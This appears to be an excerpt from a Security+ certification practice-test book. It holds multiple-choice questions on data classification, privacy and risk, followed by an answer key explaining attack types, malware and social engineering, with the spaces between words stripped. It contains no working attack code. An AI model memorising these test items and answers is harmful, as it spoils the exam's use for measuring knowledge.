D. War
114. SusanworksfortheU.S.governmentandhasidentifiedinformationinherorganizationthatrequiressomeprotection.Iftheinformationweredisclosedwithoutauthorization,itwouldcauseidentifiableharmtonationalsecurity.Howshouldsheclassifythedata?
A. TopSecret
Telegram Channel @nettrain
B. Secret
C. Confidential
D. BusinessSensitive
115. Edservesashisorganization'sdatastewardandwantstoclassifyeachdataelementthatisusedintheirbusiness.Howshouldheclassifycellphonenumbers?
A. AsPHI
B. Asfinancialinformation
C. AsPII
D. Asgovernmentinformation
116. Marcuswantstoensurethatattackerscan'tidentifyhiscustomersiftheyweretogainacopyofhisorganization'swebapplicationdatabase.HewantstoprotecttheirSocialSecuritynumbers(SSNs)withanalternatevaluethathecanreferenceelsewherewhenheneedstolookupacustomerbytheirSSN.Whattechniqueshouldheusetoaccomplishthis?
A. Encryption
B. Tokenization
C. Datamasking
D. Datawashing
117. Whichofthefollowingisthemostcommonreasontoincludeaprivacynoticeonawebsite?
A. Towarnattackersaboutsecuritymeasures
B. Toavoidlawsuits
C. Duetoregulationsorlaws
D. Noneoftheabove
118. Nicoledetermineshowherorganizationprocessesdatathatitcollectsaboutitscustomersandalsodecideshowandwhypersonalinformationshouldbeprocessed.WhatroledoesNicoleplayinherorganization?
A. Datasteward
B. Datacustodian
Telegram Channel @nettrain
C. Datacontroller
D. Dataconsumer
119. ThevirtualmachineclusterthatPatisinchargeofhassufferedamajorfailureinitsprimarycontroller.Theentireorganizationisoffline,andcustomerscannotgettotheorganization'swebsitewhichisitsprimarybusiness.WhattypeofdisasterhasPat'sorganizationexperienced?
A. AnMROdisaster
B. Aninternaldisaster
C. AnRTOdisaster
D. Anexternaldisaster
120. Whatimportantstepshouldbetakenearlyintheinformationlifecycletoensurethatorganizationscanhandlethedatatheycollect?
A. Dataretention
B. Dataclassification
C. Dataminimization
D. Dataexfiltration
121. Kirk'sorganizationhasbeenexperiencinglarge-scaledenial-of-service(DoS)attacksagainsttheirprimarywebsite.KirkcontractswithhisInternetserviceprovidertoincreasetheorganization'sbandwidthandexpandstheserverpoolforthewebsitetohandlesignificantlymoretrafficthananyofthepreviousDoSattacks.Whattypeofriskmanagementstrategyhasheemployed?
A. Acceptance
B. Avoidance
C. Transfer
D. Mitigation
122. Theco-locationfacilitythatJoannacontractstohostherorganization'sserversisinafloodplaininahurricanezone.WhattypeofriskbestdescribestheriskthatJoannaandothercustomersface?
A. Amultipartyrisk
Telegram Channel @nettrain
B. Aninternalrisk
C. Alegacyrisk
D. AnIPtheftrisk
123. ThecloudservicethatNatasha'sorganizationhasusedforthepastfiveyearswillnolongerbeavailable.WhatphaseofthevendorrelationshipshouldNatashaplanforwiththisservice?
A. PreparingaserviceMOU
B. AnEOLtransitionprocess
C. CreatinganNDA
D. Alastwillandtestament
124. GarywantstouseasecureconfigurationbenchmarkforhisorganizationforLinux.Whichofthefollowingorganizationswouldprovideauseful,commonlyadoptedbenchmarkthathecoulduse?
A. Microsoft
B. NIST
C. CIS
D. Alloftheabove
125. AfterAngelaleftherlastorganization,shediscoveredthatshestillhadaccesstohershareddrivesandcouldlogintoheremailaccount.Whatcriticalprocesswaslikelyforgottenwhensheleft?
A. Anexitinterview
B. Jobrotation
C. Offboarding
D. Governance
126. Frankknowsthatbusinessescanuseanyclassificationlabelstheywant,buthealsoknowsthatthereareanumberofcommonlabelsinuse.Whichofthefollowingisnotacommondataclassificationlabelforbusinesses?
A. Public
B. Sensitive
C. Private
Telegram Channel @nettrain
D. Secret
127. Whereareprivacynoticesfrequentlyfound?
A. Thetermsofanagreementforcustomers
B. Aclick-throughlicenseagreement
C. Awebsiteusageagreement
D. Alloftheabove
Telegram Channel @nettrain
Chapter1: Threats,Attacks,andVulnerabilities1. C. Thecorrectanswerisspearphishing.Spearphishingistargetedtoa
specificgroup,inthiscaseinsuranceprofessionals.Althoughthisisaformofphishing,themorespecificansweristheoneyouwillneedtochooseonquestionslikethis.Phishingusessocialengineeringtechniquestosucceedbutisonceagainabroaderanswerthanspearphishingandthusisnotthecorrectchoice.Finally,aTrojanhorsepretendstobealegitimateordesirableprogramorfile,whichthisscenariodoesn’tdescribe.
2. B. Alogicbombismalwarethatperformsitsmaliciousactivitywhensomeconditionismet.Awormismalwarethatself-propagates.ATrojanhorseismalwareattachedtoalegitimateprogram,andarootkitismalwarethatgetsrootoradministrativeprivileges.
3. C. ThisisaverybasicformofSQLinjection.Cross-sitescriptingwouldhaveJavaScriptinthetextfieldandwouldbedesignedtoimpactothersitesfromauser’ssession.Cross-siterequestforgerywouldnotinvolveanytextbeingenteredinthewebpage,andARPpoisoningisalteringtheARPtableinaswitch;itisnotrelatedtowebsitehacking.
4. B. Thisdescribesajammingattack,wherelegitimatetrafficisinterferedwithbyanothersignal.Jammingcanbeintentionalorunintentionalandmaybeintermittent.IVattacksareobscurecryptographicattacksonstreamciphers.Wi-Fiprotectedsetup(WPS)usesaPINtoconnecttothewirelessaccesspoint(WAP).TheWPSattackattemptstointerceptthatPINintransmission,connecttotheWAP,andthenstealtheWPA2password.Abotnetisagroupofmachinesthatarebeingused,withouttheirconsent,aspartofanattack.
5. B. Thebestoptionlistedtodefendagainsttheattacksmentionedisinputvalidation.Encryptingthewebtrafficwillnothaveanyeffectonthesetwoattacks.Awebapplicationfirewall(WAF)mightmitigatetheseattacks,butitwouldbesecondarytoinputvalidation,andanintrusiondetectionsystem(IDS)willsimplydetecttheattack—itwon’tstopit.
6. C. IfusershavebeenconnectingbuttheAPdoesnotshowthemconnecting,thentheyhavebeenconnectingtoarogueaccesspoint.Thiscouldbethecauseofanarchitectureanddesignweaknesssuchasanetworkwithoutsegmentationandcontrolofdevicesconnectingtothe
Telegram Channel @nettrain
network.Sessionhijackinginvolvestakingoveranalreadyauthenticatedsession.Mostsessionhijackingattacksinvolveimpersonation.Theattackerattemptstogainaccesstoanotheruser’ssessionbyposingasthatuser.Clickjackinginvolvescausingvisitorstoawebsitetoclickonthewrongitem.Finally,bluejackingisaBluetoothattack.
7. C. Cross-sitescriptinginvolvesenteringascriptintotextareasthatotheruserswillview.SQLinjectionisnotaboutenteringscripts,butratherSQLcommands.Clickjackingisabouttrickingusersintoclickingonthewrongthing.BluejackingisaBluetoothattack.
8. D. Retainingtheactualpasswordisnotabestpractice,andthusencryptingpasswordplaintextisnotacommontechniquetomakepasswordshardertocrack.Sincetheapplicationwouldneedthecryptographickeytoreadthepasswords,anybodywhohadaccesstothatkeycoulddecryptthepasswords.Usingasalt,apepper,andacryptographichashingalgorithmdesignedforpasswordsareallcommonbestpracticestopreventofflinebrute-forceattacks.
9. A. AlthoughthisisoneofthemoredateditemsontheSecurity+examoutline,youneedtoknowthatthetermforInternetmessagingspammessagesisSPIM.Therestoftheanswersweremadeup,andthoughthisshowsupintheexamoutline,therestoftheworldhasmovedonfromusingthisterm.
10. B. Asegmentationfaultwilltypicallystoptheprogramfromrunning.ThistypeofissueiswhyaNULLpointerorotherpointerde-referencingerrorisconsideredapotentialsecurityissue,asadenial-of-serviceconditionimpactstheavailabilityoftheservice.Thistypeoferrorisunlikelytocauseadatabreachorallowprivilegeescalation,andpermissionscreepoccursasindividualsaccruemorepermissionsovertimeinasingleorganizationastheirpermissionsarenotcleanedupwhentheyswitchpositionsorroles.
11. C. Themachinesinhernetworkarebeingusedasbots,andtheusersarenotawarethattheyarepartofadistributeddenial-of-service(DDoS)attack.Socialengineeringiswhensomeonetriestomanipulateyouintogivinginformation.Techniquesinvolvedinsocialengineeringattacksincludeconsensus,scarcity,andfamiliarity.Thereisaslightchancethatallcomputerscouldhaveabackdoor,butthatisveryunlikely,andattackersnormallydon’tmanuallylogintoeachmachinetodoaDDoS—itwouldbeautomated,asthroughabot.
Telegram Channel @nettrain
12. C. Therearemanyindicatorsofcompromise(IoCs),includingunusualoutboundnetworktraffic,geographicalirregularitieslikeloginsfromacountrywherethepersonnormallydoesnotwork,orincreasesindatabasereadvolumesbeyondnormaltrafficpatterns.Predictiveanalysisisanalysisworkdoneusingdatasetstoattempttodeterminetrendsandlikelyattackvectorssothatanalystscanfocustheireffortswheretheywillbemostneededandeffective.OSINTisopensourceintelligence,andthreatmapsareoftenreal-timeornearreal-timevisualizationsofwherethreatsarecomingfromandwheretheyareheadedto.
Usethefollowingscenarioforquestions13–15.
Chrishasrecentlydeployedasecurityinformationandeventmanagement(SIEM)deviceandwantstouseiteffectivelyinhisorganization.HeknowsthatSIEMsystemshaveabroadrangeofcapabilitiesandwantstousethefeaturestosolveproblemsthatheknowshisorganizationfaces.Ineachofthefollowingquestions,identifythemostappropriateSIEMcapabilityortechniquetoaccomplishwhatChrisneedstodoforhisorganization.
13. B. WhentroubleshootingTCPhandshakes,themostvaluabletoolinmanycasesispacketcapture.IfChrisseesaseriesofSYNpacketswithoutthehandshakebeingcompleted,hecanbereasonablysurethefirewallisblockingtraffic.Reviewingreportsorlogsmaybeusefulforthisaswellbutwon’tshowtheTCPhandshakeissuementionedintheproblem,andsentimentanalysisisfocusedonhowindividualsandgroupsareresponding,notonatechnicalproblem.
14. D. Userbehavioranalysisisakeycapabilitywhenattemptingtodetectpotentialinsiderthreats.ChriscanusehisSIEM’sbehavioralanalysiscapabilitiestodetectimproperorillicituseofrightsandprivilegesaswellasabnormalbehavioronthepartofhisusers.Sentimentanalysishelpsanalyzefeelings,andlogaggregationandsecuritymonitoringprovidewaystogaininsightintotheoverallsecuritypostureandstatusoftheorganization.
15. A. Usinglogaggregationtopulltogetherlogsfrommultiplesources,andperformingcollectionandinitialanalysisonlogcollectorscanhelpcentralizeandhandlelargelogvolumes.Capturingpacketsisusefulfornetworktrafficanalysistoidentifyissuesorsecurityconcerns.Securitymonitoringisanoverallfunctionforsecurityinformationandeventmanagement(SIEM)anddoesn’tspecificallyhelpwiththisneed.Both
Telegram Channel @nettrain
sentimentanalysisanduserbehavioranalysisareaimedatusersandgroupsratherthanathowdataiscollectedandmanaged.
16. B. Whiteteamsactasjudgesandobserversduringcybersecurityexercises.Blueteamsactasdefenders,redteamsactasattackers,andpurpleteamsarecomposedofbothblueandredteammemberstocombineattackanddefenseknowledgetoimproveorganizationalsecurity.
17. A. ThesimplestwaytoensurethatAPIsareonlyusedbylegitimateusersistorequiretheuseofauthentication.APIkeysareoneofthemostfrequentlyusedmethodsforthis.IfanAPIkeyislostorstolen,thekeycanbeinvalidatedandreissued,andsinceAPIkeyscanbematchedtousage,Cynthia’scompanycanalsobillcustomersbasedontheirusagepatternsiftheywantto.AfirewallorIPrestrictionsmaybeabletohelp,buttheycanbefragile;customerIPaddressesmaychange.Anintrusionpreventionsystem(IPS)candetectandpreventattacks,butlegitimateusagewouldbehardtotellfromthosewhoarenotcustomersusinganIPS.
18. B. Bufferoverflowattackscrammoredataintoafieldorbufferthantheycanaccept,overflowingintoothermemorylocationsandeithercrashingthesystemorapplication,orpotentiallyallowingcodetobeinsertedintoexecutablelocations.BluesnarfingandbluejackingarebothBluetoothattacks.Cross-sitescriptingattacksallowattackerstoinjectscriptsintopagesviewedbyotherusers.
19. A. AttackersareattemptingtoinfluenceGurvinderwithacombinationofscarcityandurgency.Thus,forthisquestionyoushouldanswerscarcitysinceurgencyisnotlisted.Inmanysocialengineeringprinciplequestions,morethanoneoftheprinciplesmaybeinplay,andyouwillneedtoanswerwiththeprinciplethatiscorrectormorecorrectforthequestion.Inthiscase,thereisnointimidationorclaimtoauthority,andconsensuswouldrequiresomeformofvalidationfromothers.
20. A. Vulnerabilityscansuseautomatedtoolstolookforknownvulnerabilitiesinsystemsandapplicationsandthenprovidereportstoassistinremediationactivities.Penetrationtestsseektoactuallyexploitthevulnerabilitiesandbreakintosystems.Securityauditsusuallyfocusoncheckingpolicies,incidentreports,andotherdocuments.Securitytestisagenerictermforanysortoftest.
21. C. Usernamecomplexityhasnoimpactincredentialharvesting.Multifactorauthenticationcanhelppreventsuccessfulcredentialharvesting
Telegram Channel @nettrain
byensuringthatevencaptureofusernameandpasswordisnotenoughtocompromisetheaccount.Awarenesstraininghelpstoreducethelikelihoodofcredentialexposure,andlimitingorpreventinguseofthird-partywebscriptsmakeswebsiteslesslikelytohavecredentialsstolenthroughtheuseofthosescripts,plug-ins,ormodules.
22. C. GregcanclonealegitimateMediaAccessControl(MAC)addressifhecanidentifyoneonthenetwork.ThiscanbeaseasyascheckingforaMAClabelonsomedevicesorbycapturingtrafficonthenetworkifhecanphysicallyaccessit.
23. A. Fromthedescriptionitappearsthattheyarenotconnectingtotherealwebserverbutratherafakeserver.Thatindicatestyposquatting:haveaURLthatisnamedverysimilarlytoarealsitesothatwhenusersmistypetherealsite’sURLtheywillgotothefakesite.
OptionsB,C,andDareallincorrect.Theseareallmethodsofattackingawebsite,butinthiscase,theactualwebsitewasnotattacked.Instead,someusersarevisitingafakesite.
24. C. Domainhijacking,ordomaintheft,occurswhentheregistrationorotherinformationforthedomainischangedwithouttheoriginalregistrant’spermission.Thismayoccurbecauseofacompromisedaccountorduetoabreachofthedomainregistrar’ssecurity.Acommonissueisalapseddomainbeingpurchasedbyathirdparty,andthiscanlooklikeahijackeddomain,butitisalegitimateoccurrenceifthedomainisnotrenewed!DNShijackinginsertsfalseinformationintoaDNSserver,on-path(man-in-the-middle)attackscaptureormodifytrafficbycausingthetraffictopassthroughacompromisedmidpoint,andzero-dayattacksareattacksthatuseanunknownuntilusedvulnerability.
25. D. Thetermforlow-skilledhackersisscriptkiddie.Scriptkiddiestypicallyuseprebuilttoolsanddonothavetheexpertisetomakeormodifytheirowntools.Nothingindicatesthisisbeingdoneforideologicalreasons,andthusthatahacktivistisinvolved.Although“Amateur”maybeanappropriatedescription,thecorrecttermisscriptkiddie.Finally,nothinginthisscenarioindicatesaninsiderthreat.
26. B. Phishingisintendedtoacquiredata,mostoftencredentialsorotherinformationthatwillbeusefultotheattacker.Spamisabroadertermforunwantedemail,althoughthetermisoftengenerallyusedtodescribeunwantedcommunications.Spearphishingtargetsspecificindividuals,
Telegram Channel @nettrain
whereaswhalingtargetsimportantpeopleinanorganization.SmishingissentviaSMS(textmessage).Malwarecanbesentinanyoftheseinstances,butthereisnotaspecificrelatedtermthatmeans“spamwithmalwareinit.”
27. B. Acollectionofcomputersthatarecompromised,thencentrallycontrolledtoperformactionslikedenial-of-serviceattacks,datacollection,andothermaliciousactivitiesiscalledabotnet.Zombienets,Nullnets,andAttacknetsarenotcommonlyusedtermstodescribebotnets.
28. B. Systemsandsoftwarethatnolongerhavevendorsupportcanbeasignificantsecurityrisk,andensuringthatavendorwillcontinuetoexistandprovidesupportisanimportantpartofmanyprocurementprocesses.Selah’squestionsareintendedtoassessthelongevityandviabilityofthecompanyandwhetherbuyingfromthemwillresultinherorganizationhavingausableproductforthelongterm.
29. B. Passivereconnaissanceisanyreconnaissancethatisdonewithoutactuallyconnectingtothetarget.Inthiscase,JohnisconductingaformofOSINT,oropensourceintelligence,byusingcommonlyavailablethird-partyinformationsourcestogatherinformationabouthistarget.Activereconnaissanceinvolvescommunicatingwiththetargetnetwork,suchasdoingaportscan.Theinitialexploitationisnotinformationgathering;itisactuallybreakingintothetargetnetwork.Apivotiswhenyouhavebreachedonesystemandusethattomovetoanothersystem.
30. A. Server-siderequestforgery(SSRF)attemptstypicallyattempttogetHTTPdatapassedthroughandwillnotincludeSQLinjection.Blockingsensitivehostnames,IPaddresses,andURLsareallvalidwaystopreventSSRF,asistheuseofwhitelist-basedinputfilters.
31. A. DomainNameSystem(DNS)poisoningattacksattempttoinsertincorrectormaliciousentriesintoatrustedDNSserver.AddressResolutionProtocol(ARP)poisoninginvolvesalteringtheMAC-IPtablesinaswitch.Althoughcross-sitescripting(XSS)andcross-siterequestforgery(CSRForXSRF)arebothtypesofattacks,neitherisapoisoningattack.
32. C. Anunknownenvironmenttestisalsocalledblack-boxorazero-knowledgetestbecauseitdoesnotprovideinformationbeyondthebasicinformationneededtoidentifythetarget.Aknownenvironment,orwhite-boxtest,involvesverycompleteinformationbeinggiventothetester.Thisscenarioisprobablydonefromoutsidethenetwork,butexternaltestisnot
Telegram Channel @nettrain
thecorrectterminology.Threattestisnotatermusedinpenetrationtesting.
33. D. Apivotoccurswhenyouexploitonemachineandusethatasabasistoattackothersystems.Pivotingcanbedonefrominternalorexternaltests.White-andblack-boxtestingdescribestheamountofinformationthetesterisgiveninadvance,nothowthetesterperformsthetest.
34. A. Shimmingiswhentheattackerplacessomemalwarebetweenanapplicationandsomeotherfileandinterceptsthecommunicationtothatfile(usuallytoalibraryorsystemAPI).Inmanycases,thisisdonewithadriverforahardwarecomponent.ATrojanhorsemightbeusedtogettheshimontothesystem,butthatisnotdescribedinthisscenario.Abackdoorisameanstocircumventsystemauthorizationandgetdirectaccesstothesystem.Refactoringistheprocessofchangingnamesofvariables,functions,andsoforthinaprogram.
35. C. SOARisarelativelynewcategoryasdefinedbyGartner.Securityorchestration,automation,andresponseincludesthreatandvulnerabilitymanagement,securityincidentresponse,andsecurityoperationsautomation,butnotautomatedmalwareanalysis.
36. C. DomainreputationserviceslikeReputationAuthority,Cisco’sTalos,McAfee’strustedsource.org,andBarracuda’sbarracudacentral.orgsitesallprovidedomainreputationdatathatallowyoutolookupadomainorIPaddresstodetermineifitiscurrentlyblacklistedorhasapoorreputation.
37. B. Hismachinesarepartofadistributeddenial-of-service(DDoS)attack.ThisscenariodescribesagenericDDoS,notaspecificonelikeSYNflood,whichwouldinvolvemanySYNpacketsbeingsentwithoutafullthree-wayTCPhandshake.Thesemachinescouldbepartofabotnetortheymayjusthaveatriggerthatcausesthemtolaunchtheattackataspecifictime.TherealkeyinthisscenarioistheDDoSattack.Finally,abackdoorgivesanattackeraccesstothetargetsystem.
38. B. SinceopenWi-Fihotspotsdonothaveawaytoprovetheyarelegitimate,theycanbeeasilyspoofed.AttackerscanstandupafakeversionofthehotspotandthenconductanSSLstrippingattackbyinsertingthemselvesintosessionsthatvictimsattempttoopentosecureservers.
39. B. ATrojanhorseattachesamaliciousprogramtoalegitimateprogram.Whentheuserdownloadsandinstallsthelegitimateprogram,theygetthemalware.Alogicbombismalwarethatdoesitsmisdeedswhensome
Telegram Channel @nettrain
conditionismet.Arootkitismalwarethatgetsadministrative,orroot,access.Amacrovirusisavirusthatisembeddedinadocumentasamacro.
40. D. Whalingistargetingaspecificindividualwhoisimportantintheorganizationlikethepresidentorchieffinancialofficer(CFO).Spearphishingtargetsspecificindividualsorgroups,butwhalingismorespecificintermsoftheimportanceoftheindividualsinvolved.Targetedphishingisnotatermusedintheindustry.Phishingisthegenerictermforawiderangeofrelatedattacks,andyoushouldchoosethemostaccurateanswerforquestionslikethis.
41. D. Criminalsyndicatesmayproduce,sell,andsupportmalwaretools,ormaydeploythemthemselves.Cryptomalwareandotherpackagesareexamplesoftoolsoftencreatedandusedbycriminalsyndicates.Stateactorsaremorelikelytobeassociatedwithadvancedpersistentthreats(APTs)aimedataccomplishinggoalsofthenation-statethatsupportsthem.Hacktiviststypicallyhavepoliticalmotivations,whereasscriptkiddiesmaysimplybeinitforrecognitionorfun.
42. A. Arainbowtableisatableofprecomputedhashes,usedtoretrievepasswords.Abackdoorisusedtogainaccesstoasystem,nottorecoverpasswords.Socialengineeringanddictionaryattackscanbothbeusedtogainaccesstopasswords,buttheyarenottablesofprecomputedhashes.
43. B. Themostcommonconcernthatwillarisewhenavendornolongersupportsadeviceisalackofupdatesorpatches.Thisisparticularlyconcerningwhenthedevicesareoperationaltechnologysuchasutility,lighting,orotherinfrastructurecontroldevicesthathaveaverylonglifecycleandcontrolimportantprocessesorsystems.Althoughimproperdatastorage,lackofdocumentation,andconfigurationissuescanallbeissues,lackofupdatesandpatchingremainsthebiggestandmostfrequentissue.
44. A. BluejackinginvolvessendingunsolicitedmessagestoBluetoothdeviceswhentheyareinrange.BluesnarfinginvolvesgettingdatafromtheBluetoothdevice.Aneviltwinattackusesarogueaccesspointwhosenameissimilaroridenticaltothatofalegitimateaccesspoint.
45. A. SinceDennisisabletoviewthewebtrafficbeforeitissenttotheactualserver,heshouldbeabletoconductaplain-textpasswordattackbyinterceptingthepassword.Pass-the-hashattacksaretypicallyusedinsideWindowsenvironments,SQLinjectionwouldattacktheserver,andcross-sitescriptingispossiblebutnotaslikelyastheplain-textpasswordattack
Telegram Channel @nettrain
inthisscenario.
46. A. Dumpsterdivingisthetermforrummagingthroughthewaste/trashtorecoverusefuldocumentsormaterials.Penetrationtestersandattackersmaydumpster-diveaspartoftheirefforts.Infact,emptyingtrashcansinalocationcanprovideusefulinformationevenwithoutjumpingintoadumpster!Trashdivingandtrashengineeringarenotthetermsusedintheindustry.Nothinginthisscenariodescribessocialengineering.
47. A. Thisisaremote-accessTrojan(RAT),malwarethatopensaccessforsomeonetoremotelyaccessthesystem.Awormwouldhavespreaditselfviaavulnerability,whereasalogicbombrunswhensomelogicalconditionismet.Finally,arootkitprovidesrootoradministrativeaccesstothesystem.
48. B. Zero-dayexploitsarenew,andtheyarenotinthevirusdefinitionsfortheantivirus(AV)programs.Thismakesthemdifficulttodetect,exceptbytheirbehavior.RATs,worms,androotkitsaremorelikelytobedetectedbyAVprograms.
49. D. Radiofrequencyidentifier(RFID)attackstypicallyfocusondatacapture,spoofingRFIDdata,orconductingadenial-of-serviceattack.Birthdayattacksareusedagainstcryptosystems,whichmaybepartofanRFIDtagenvironment,buttheyaren’tacommonattackagainstRFIDsystems.
50. C. Initializationvectorsareusedwithstreamciphers.AnIVattackattemptstoexploitaflawtousetheIVtoexposeencrypteddata.Nothinginthisscenariorequiresordescribesarogueaccesspoint/eviltwin.Wi-FiProtectedSetup(WPS)usesaPINtoconnecttothewirelessaccesspoint(WAP).TheWPSattackattemptstointerceptthatPINintransmission,connecttotheWAP,andthenstealtheWPA2password.
51. C. Thisdescriptiondoesnotincludeanyrisktoavailabilitysincethereisnoinformationaboutsystemsorservicesbeingdownoroffline.Thisscenariowouldlikelyresultinreputational,financial,anddatalossimpactsforScott’scompany.
52. B. Cross-siterequestforgery(XSRForCSRF)sendsfakerequeststoawebsitethatpurporttobefromatrusted,authenticateduser.Cross-sitescripting(XSS)exploitsthetrusttheuserhasforthewebsiteandembedsscriptsintothatwebsite.BluejackingisaBluetoothattack.Nothinginthisscenariorequiresordescribesaneviltwin,whichisanattackthatusesa
Telegram Channel @nettrain
maliciousaccesspointthatduplicatesalegitimateAP.
53. A. Cyberintelligencefusionistheprocessofgathering,analyzing,andthendistributinginformationbetweendisparateagenciesandorganizations.FusioncenterslikethoseoperatedbytheU.S.DepartmentofHomelandSecurity(DHS)focusonstrengtheningsharedintelligenceactivities.Theyarenotspecificallytaskedwithbuildingtoolsbycombiningothertools,althoughtheymayinsomecases.Theyarenotpowerplants,andtheyarefocusedongatheringandsharinginformation,notbuildingaclassificationstructure.
54. B. TheCommonVulnerabilitiesandExposures(CVE)listhasentriesthatdescribeandprovidereferencestopubliclyknowncybersecurityvulnerabilities.ACVEfeedwillprovideupdatedinformationaboutnewvulnerabilitiesandausefulindexnumbertocrossreferencewithotherservices.
55. B. Abirthdayattackexploitsthebirthdayprobleminprobabilitytheoryandreliesonfindingcollisionsbetweenrandomattackattemptsandthenumberofpotentialpermutationsofasolution.Birthdayattacksareonemethodofattackingcryptographichashfunctions.Theyarenotasocialengineeringattack,anetworkdenial-of-serviceattack,oraTCP/IPprotocolattack.
56. B. Thisanexampleofadisassociationattack.ThedeauthenticationpacketcausesJuanita’ssystemtodisassociate,andtheattackercanthenexecuteasecondattacktargetingherauthenticationcredentialsorotherwirelessdatausinganeviltwinattack.Misconfigurationwon’tcauseauthenticateduserstodeauthenticate.Sessionhijackinginvolvestakingoveranauthenticatedsession.Backdoorsarebuilt-inmethodstocircumventauthentication.
57. A. Dictionaryattacksusealistofwordsthatarebelievedtobelikelypasswords.Arainbowtableisaprecomputedtableofhashes.Bruteforcetrieseverypossiblerandomcombination.Ifanattackerhastheoriginalplaintextandciphertextforamessage,theycandeterminethekeyspaceusedthroughbrute-forceattemptstargetingthekeyspace.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.
58. B. DowngradeattacksseektomakeaTransportLayerSecurity(TLS)connectionuseaweakercipherversion,thusallowingtheattackertomoreeasilybreaktheencryptionandreadtheprotecteddata.Inadisassociationattack,theattackerattemptstoforcethevictimintodisassociatingfroma
Telegram Channel @nettrain
resource.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.Brute-forceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.
59. D. Acollisioniswhentwodifferentinputsproducethesamehash.Arainbowtableisatableofprecomputedhashes.Bruteforceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.Sessionhijackingiswhentheattackertakesoveranauthenticatedsession.
60. C. Anadvancedpersistentthreat(APT)involvessophisticated(i.e.,advanced)attacksoveraperiodoftime(i.e.,persistent).Adistributeddenial-of-service(DDoS)couldbeapartofanAPT,butinandofitselfisunlikelytobeanAPT.Bruteforceattemptseverypossiblerandomcombinationtogetthepasswordorencryptionkey.Inadisassociationattack,theattackerattemptstoforcethevictimintodisassociatingfromaresource.
61. B. Phishingisnotcommonlyusedtoacquireemailaddresses.Phishingemailstargetpersonalinformationandsensitiveinformationlikepasswordsandcreditcardnumbersinmostcases.
62. A. WhenanIDSorantivirusmistakeslegitimatetrafficforanattack,thisiscalledafalsepositive.AfalsenegativeiswhentheIDSmistakesanattackforlegitimatetraffic.Itistheoppositeofafalsepositive.OptionsCandDarebothincorrect.Althoughthesemaybegrammaticallycorrect,thesearenotthetermsusedintheindustry.Inmilitaryoperations,falseflagoperationsattempttotransferblametoanothercompany,thusa“falseflag.”
63. B. Akeyloggerisasoftwareorhardwaretoolusedtocapturekeystrokes.Keyloggersareoftenusedbyattackerstocapturecredentialsandothersensitiveinformation.Arootkitisusedtoobtainandmaintainadministrativerightsonasystem,andawormisaself-spreadingformofmalwarethatfrequentlytargetsvulnerableservicesonanetworktospread.
64. A. Thetermforattemptingtogainanyprivilegesbeyondwhatyouhaveisprivilegeescalation.Sessionhijackingistakingoveranauthenticatedsession.Rootgrabbingandclimbingarenottermsusedintheindustry.
65. B. MACfloodingattacksattempttooverflowaswitch’sCAMtable,causingtheswitchtosendalltraffictoallportsratherthantotheportthatagivenMACaddressisassociatedwith.Althoughthiswaspossiblewithmanyolderswitches,mostmodernswitchesarelesssusceptibletothistypeofattack,andsomehavesecuritycapabilitiesbuiltintopreventthistypeof
Telegram Channel @nettrain
attack.
66. B. SpywareandadwarearebothcommonexamplesPUPs,orpotentiallyunwantedprograms.Thoughnotdirectlymalicious,theycanposeriskstouserprivacyaswellascreateannoyanceslikepopupsorotherunwantedbehaviors.Trojansappeartobelegitimateprogramsorarepairedwiththem,RATsprovideremoteaccessandareasubcategoryofTrojans,andransomwaredemandspaymentorotheractionstoavoiddamagetofilesorreputation.
67. C. Araceconditioncanoccurwhenmultiplethreadsinanapplicationareusingthesamevariableandthesituationisnotproperlyhandled.OptionAisincorrect.Abufferoverflowisattemptingtoputmoredatainabufferthanitisdesignedtohold.OptionBisincorrect.Alogicbombismalwarethatperformsitsmisdeedwhensomelogicalconditionismet.OptionDisincorrect.Asthenamesuggests,impropererrorhandlingisthelackofadequateorappropriateerrorhandlingmechanismswithinsoftware.
68. B. ThemalwareinthisexampleisaTrojanhorse—itpretendstobesomethingdesirable,oratleastinnocuous,andinstallsmalicioussoftwareinadditiontoorinsteadofthedesiredsoftware.Arootkitgivesrootoradministrativeaccess,spywareismalwarethatrecordsuseractivities,andabootsectorvirusisavirusthatinfectsthebootsectoroftheharddrive.
69. B. ThePostgresserverissetupusingaweakpasswordfortheuserpostgres,theadministrativeloginforthedatabase.Thisisaformofunsecuredadministrativeorrootaccount.Interestingly,thisisnotadefaultsetting,sincePostgresusesnopasswordbydefaultforthePostgresaccount—anevenworsesettingthanusingpostgresasthepassword,butnotbymuch!
70. A. Anniehasmovedlaterally.Lateralmovementmovestosystemsatthesametrustlevel.Thiscanprovideaccesstonewdataordifferentviewsofthenetworkdependingonhowthesystemsandsecurityareconfigured.Privilegeescalationinvolvesgainingadditionalprivileges,oftenthoseofanadministrativeuser.Verticalmovementissometimesreferencedwhengainingaccesstosystemsoraccountswithahighersecurityortrustlevel.Privilegeretentionwasmadeupforthisquestion.
71. A. Thisisanexampleofafalsepositive.Afalsepositivecancauseavulnerabilitytoshowthatwasnotactuallythere.Thissometimeshappenswhenapatchorfixisinstalledbuttheapplicationdoesnotchangeinaway
Telegram Channel @nettrain
thatshowsthechange,andithasbeenanissuewithupdateswheretheversionnumberistheprimarycheckforavulnerability.Whenavulnerabilityscannerseesavulnerableversionnumberbutapatchhasbeeninstalledthatdoesnotupdateit,afalsepositivereportcanoccur.Afalsenegativewouldreportapatchorfixwheretherewasactuallyavulnerability.Automaticupdateswerenotmentioned,norwasaspecificApacheversion.
72. C. Abufferoverflowispossiblewhenboundariesarenotcheckedandtheattackertriestoputinmoredatathanthevariablecanhold.Cross-sitescripting(XSS)isawebpageattack.Cross-siterequestforgery(CSRF)isawebpageattack.Alogicbombismalwarethatperformsitsmisdeedwhensomeconditionismet.
73. C. Consensus,sometimescalledsocialproof,isasocialengineeringprinciplethatleveragesthefactthatpeopleareoftenwillingtotrustgroupsofotherpeople.Here,theattackershaveplantedfalseinformationthatthesoftwareistrustworthy,thusallowingtargetsto“prove”tothemselvesthattheycansafelyinstallthesoftware.Scarcityusesaperceptionthatsomethingmaynotbeavailableorisuncommonandthusdesirable.Familiaritytakesadvantageofthetrustthatindividualsputintopeopleandorganizationstheyarealreadyfamiliarwith.Trust-basedattacksexploitaperceptionoftrustworthiness.
